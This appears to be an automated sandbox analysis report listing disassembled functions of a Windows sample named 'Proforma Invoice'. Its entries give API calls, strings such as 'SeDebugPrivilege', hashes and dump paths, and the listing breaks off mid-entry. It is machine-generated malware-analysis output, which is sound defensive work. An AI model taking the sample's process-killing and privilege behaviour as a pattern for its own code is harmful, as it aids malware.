                                                                                                • Opcode ID: f86b61ed6fc84eeb28365a1527b20c8018d88df0844e7309135985f8e3e8f008
                                                                                                • Instruction ID: c3170e03b2aa321a10388ed6cffe446dfcbee8d930500fbcbe5482647c9591fb
                                                                                                • Opcode Fuzzy Hash: f86b61ed6fc84eeb28365a1527b20c8018d88df0844e7309135985f8e3e8f008
                                                                                                • Instruction Fuzzy Hash: A9C1B271A002099BDF10CF68D895AEEB7F5FB48310F148469EA45A72C0E774AD86CBA0
                                                                                                APIs
                                                                                                  • Part of subcall function 006F710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?,?,006F7455), ref: 006F7127
                                                                                                  • Part of subcall function 006F710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?), ref: 006F7142
                                                                                                  • Part of subcall function 006F710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?), ref: 006F7150
                                                                                                  • Part of subcall function 006F710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?), ref: 006F7160
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00719806
                                                                                                • _memset.LIBCMT ref: 00719813
                                                                                                • _memset.LIBCMT ref: 00719956
                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00719982
                                                                                                • CoTaskMemFree.OLE32(?), ref: 0071998D
                                                                                                Strings
                                                                                                • NULL Pointer assignment, xrefs: 007199DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                • String ID: NULL Pointer assignment
                                                                                                • API String ID: 1300414916-2785691316
                                                                                                • Opcode ID: 7e8b0c9e6bfb14bf3f53293f98698c72b07ea6600db2c36d27fbf21f7d583637
                                                                                                • Instruction ID: f1bf96329fe42c3033fe346f12cfbb6bdc64a6164dd907d7332449de16117ddb
                                                                                                • Opcode Fuzzy Hash: 7e8b0c9e6bfb14bf3f53293f98698c72b07ea6600db2c36d27fbf21f7d583637
                                                                                                • Instruction Fuzzy Hash: 28915971D00219EBDB10DFA4DC55EDEBBB9EF09310F10812AF519A7281DB75AA45CFA0
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00726E24
                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00726E38
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00726E52
                                                                                                • _wcscat.LIBCMT ref: 00726EAD
                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00726EC4
                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00726EF2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                • String ID: SysListView32
                                                                                                • API String ID: 307300125-78025650
                                                                                                • Opcode ID: ee25d1f1c27f9aa85bb6252f5f9d8807c891d8ec73a4d51bf8c3d4cd91bc2434
                                                                                                • Instruction ID: b403cbfc6ac07580e4d22aa725cfc6490aad9a12b98fa0199676eaf875e21f6f
                                                                                                • Opcode Fuzzy Hash: ee25d1f1c27f9aa85bb6252f5f9d8807c891d8ec73a4d51bf8c3d4cd91bc2434
                                                                                                • Instruction Fuzzy Hash: F641D074A00318EFDF219F64DC85BEE77B9EF08350F10442AF984E7291C2799D848B64
                                                                                                APIs
                                                                                                  • Part of subcall function 00703C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00703C7A
                                                                                                  • Part of subcall function 00703C55: Process32FirstW.KERNEL32(00000000,?), ref: 00703C88
                                                                                                  • Part of subcall function 00703C55: CloseHandle.KERNEL32(00000000), ref: 00703D52
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071E9A4
                                                                                                • GetLastError.KERNEL32 ref: 0071E9B7
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071E9E6
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0071EA63
                                                                                                • GetLastError.KERNEL32(00000000), ref: 0071EA6E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0071EAA3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                • String ID: SeDebugPrivilege
                                                                                                • API String ID: 2533919879-2896544425
                                                                                                • Opcode ID: 30c6ce0e55d56776957c098d12d167b56a3c1bbb5b9e7c7cde0eea77cceb956b
                                                                                                • Instruction ID: 8558459f2cddfceac3c08e72d24d9c0477b45c81b58a1005e8271ce5fc2ee1c9
                                                                                                • Opcode Fuzzy Hash: 30c6ce0e55d56776957c098d12d167b56a3c1bbb5b9e7c7cde0eea77cceb956b
                                                                                                • Instruction Fuzzy Hash: DE41BC702002059FDB24EF28CC95FBEB7A6AF41710F14855CFA429B2D2CB79AD45CB99
                                                                                                APIs
                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00703033
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconLoad
                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                • API String ID: 2457776203-404129466
                                                                                                • Opcode ID: f8509832ebc088927a24dfdb80c82fcdf7dc7e9f9fec98c92dde18eef0134b24
                                                                                                • Instruction ID: c1fc03444ef5b7dd989b80de2123f8612b7d7b68039eee90ba68d2873fcadec9
                                                                                                • Opcode Fuzzy Hash: f8509832ebc088927a24dfdb80c82fcdf7dc7e9f9fec98c92dde18eef0134b24
                                                                                                • Instruction Fuzzy Hash: 0A113835249387FBE7149A14DC42DAB67DDDF19360B20412EFD00B61C2EABC6F0445A5
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00704312
                                                                                                • LoadStringW.USER32(00000000), ref: 00704319
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0070432F
                                                                                                • LoadStringW.USER32(00000000), ref: 00704336
                                                                                                • _wprintf.LIBCMT ref: 0070435C
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0070437A
                                                                                                Strings
                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00704357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                • API String ID: 3648134473-3128320259
                                                                                                • Opcode ID: 577cc3d383df300cb5446d8c0438a07a1ef7680543bb104bfb86c6d3deef5eeb
                                                                                                • Instruction ID: 6bf8c87b961d9f28f54cf89240a5ca9bba561463f76d388dcc3ba7b8266f87ca
                                                                                                • Opcode Fuzzy Hash: 577cc3d383df300cb5446d8c0438a07a1ef7680543bb104bfb86c6d3deef5eeb
                                                                                                • Instruction Fuzzy Hash: 70014FF2900208BFE7619BA0DD89EEA777CEB08701F4045B5FB45E2051EA785E854B75
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0072D47C
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0072D49C
                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0072D6D7
                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0072D6F5
                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0072D716
                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0072D735
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0072D75A
                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0072D77D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                • String ID:
                                                                                                • API String ID: 1211466189-0
                                                                                                • Opcode ID: 6ce6cf71f1bf9c14772915a050e94b5a9eba045d83ba47fca810e4c5f37cae77
                                                                                                • Instruction ID: c7a79a1b0f3432f49bcd803d84c25407d56316619386c135b0a9de5a8b0cbe98
                                                                                                • Opcode Fuzzy Hash: 6ce6cf71f1bf9c14772915a050e94b5a9eba045d83ba47fca810e4c5f37cae77
                                                                                                • Instruction Fuzzy Hash: 58B17971600225EBDF28CF69D989BA97BB1FF04711F08C069EC489B295D778AD50CBA0
                                                                                                APIs
                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006DC1C7,00000004,00000000,00000000,00000000), ref: 006A2ACF
                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006DC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 006A2B17
                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006DC1C7,00000004,00000000,00000000,00000000), ref: 006DC21A
                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006DC1C7,00000004,00000000,00000000,00000000), ref: 006DC286
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ShowWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1268545403-0
                                                                                                • Opcode ID: 09826ce0649e093c92c876d200786c2f7c5be8a9da0b33433a37ad5fee374c44
                                                                                                • Instruction ID: ca32a743d444a6330a8e916b2abf76dc1106756c7ee23bdff71cec4a965076e3
                                                                                                • Opcode Fuzzy Hash: 09826ce0649e093c92c876d200786c2f7c5be8a9da0b33433a37ad5fee374c44
                                                                                                • Instruction Fuzzy Hash: BC411B316446829BC735AB2C8DA8BAB7BA3AF47310F14C42EE14782760C6759D42DF20
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007070DD
                                                                                                  • Part of subcall function 006C0DB6: std::exception::exception.LIBCMT ref: 006C0DEC
                                                                                                  • Part of subcall function 006C0DB6: __CxxThrowException@8.LIBCMT ref: 006C0E01
                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00707114
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00707130
                                                                                                • _memmove.LIBCMT ref: 0070717E
                                                                                                • _memmove.LIBCMT ref: 0070719B
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 007071AA
                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007071BF
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007071DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                • String ID:
                                                                                                • API String ID: 256516436-0
                                                                                                • Opcode ID: c130063e79ccfe31c725aa76af3766a5c64d5a08a3373530a7abb5249e841801
                                                                                                • Instruction ID: 7cc3722ae6fbcb6ac50d898ae398d4ea26894df9cd8b97e640a3c07292c518b4
                                                                                                • Opcode Fuzzy Hash: c130063e79ccfe31c725aa76af3766a5c64d5a08a3373530a7abb5249e841801
                                                                                                • Instruction Fuzzy Hash: 04316E31900205EBDB50DFA4DC85EAEB7B9FF45710F1481B9F9049B286DB74AE11CB64
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(00000000), ref: 007261EB
                                                                                                • GetDC.USER32(00000000), ref: 007261F3
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007261FE
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0072620A
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00726246
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00726257
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0072902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00726291
                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007262B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3864802216-0
                                                                                                • Opcode ID: 0f14048a9ae4a2d022ab534c42a74eba140d3e4f766624ec3cd818e9ee97a126
                                                                                                • Instruction ID: bb7a584d0f35571c7353cc3fa879371450996b98ffcde57142b5f48ad4dcae00
                                                                                                • Opcode Fuzzy Hash: 0f14048a9ae4a2d022ab534c42a74eba140d3e4f766624ec3cd818e9ee97a126
                                                                                                • Instruction Fuzzy Hash: CA314F72101214BFEB218F50DC8AFEB3BA9FF49765F044065FE089A291D6799C52CB64
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 2931989736-0
                                                                                                • Opcode ID: a9de0adae0b5e3a82816d495c960d53d0956cfc7ec245b3584dc016ec41f51b4
                                                                                                • Instruction ID: 00e0cd8bee4dc6dbeedcdb255761f248713bd36a25a6f2fcb23de075608e2de2
                                                                                                • Opcode Fuzzy Hash: a9de0adae0b5e3a82816d495c960d53d0956cfc7ec245b3584dc016ec41f51b4
                                                                                                • Instruction Fuzzy Hash: 4B2195B170120D7BB6086611ED42FFB779FDE16348F049019FE049A647EF58DE1282E5
                                                                                                APIs
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                  • Part of subcall function 006BFC86: _wcscpy.LIBCMT ref: 006BFCA9
                                                                                                • _wcstok.LIBCMT ref: 0070EC94
                                                                                                • _wcscpy.LIBCMT ref: 0070ED23
                                                                                                • _memset.LIBCMT ref: 0070ED56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                • String ID: X
                                                                                                • API String ID: 774024439-3081909835
                                                                                                • Opcode ID: 2ee03d4dbc1e011a433673e832ddbc9e145b10ca75d20287bf1753fdb2bb48df
                                                                                                • Instruction ID: c1714acb2705d74a55619b67d3abb023fc94bd1d863512cc81751823506e47b8
                                                                                                • Opcode Fuzzy Hash: 2ee03d4dbc1e011a433673e832ddbc9e145b10ca75d20287bf1753fdb2bb48df
                                                                                                • Instruction Fuzzy Hash: 19C18C71508301DFD794EF24C841A6BB7E1EF86310F10492DF89A9B2A2DB74EC45CB96
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ddae541509f73b651fb721079d1643965aa8946a198f78ab9f3ac48f62b5b97e
                                                                                                • Instruction ID: 42f7b51e1d5c2b1da8dc440a912e9d03182b33145a80c34fbb2fbfd9f0dad0c1
                                                                                                • Opcode Fuzzy Hash: ddae541509f73b651fb721079d1643965aa8946a198f78ab9f3ac48f62b5b97e
                                                                                                • Instruction Fuzzy Hash: 38716D34904109EFCB149F58CC45AFEBBB6FF8A310F148159F915AA251C734AE52CF64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d0ad9938cdcad7d1eadbd87798cbb5e04656fc3f202029464e7d2b34cafbaf9a
                                                                                                • Instruction ID: de4353fab42c393cb1cad40d83fe90458330c59b642458af970b69586d7c46fa
                                                                                                • Opcode Fuzzy Hash: d0ad9938cdcad7d1eadbd87798cbb5e04656fc3f202029464e7d2b34cafbaf9a
                                                                                                • Instruction Fuzzy Hash: 6F61C071208300ABC750FB28DC85EABB7EAAF85714F10491DF5869B2D2DB34ED41CB66
                                                                                                APIs
                                                                                                • IsWindow.USER32(011A5670), ref: 0072B3EB
                                                                                                • IsWindowEnabled.USER32(011A5670), ref: 0072B3F7
                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0072B4DB
                                                                                                • SendMessageW.USER32(011A5670,000000B0,?,?), ref: 0072B512
                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0072B54F
                                                                                                • GetWindowLongW.USER32(011A5670,000000EC), ref: 0072B571
                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0072B589
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                • String ID:
                                                                                                • API String ID: 4072528602-0
                                                                                                • Opcode ID: 53bf776a01b9fbb15be985bfbc87d18ec5db10c50ef7252fb5473cff08ba2344
                                                                                                • Instruction ID: ee6884d300495713d5c6d57e8876850cc0ea4fffd0a56c5c44036ac1afdb0a8a
                                                                                                • Opcode Fuzzy Hash: 53bf776a01b9fbb15be985bfbc87d18ec5db10c50ef7252fb5473cff08ba2344
                                                                                                • Instruction Fuzzy Hash: 6571B134600265EFDB24EF94E8D4FBA7BB5EF09300F148069FA46972A2C739AD51DB50
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0071F448
                                                                                                • _memset.LIBCMT ref: 0071F511
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0071F556
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                  • Part of subcall function 006BFC86: _wcscpy.LIBCMT ref: 006BFCA9
                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0071F5CD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0071F5FC
                                                                                                Strings
                                                                                                Memory Dump Source
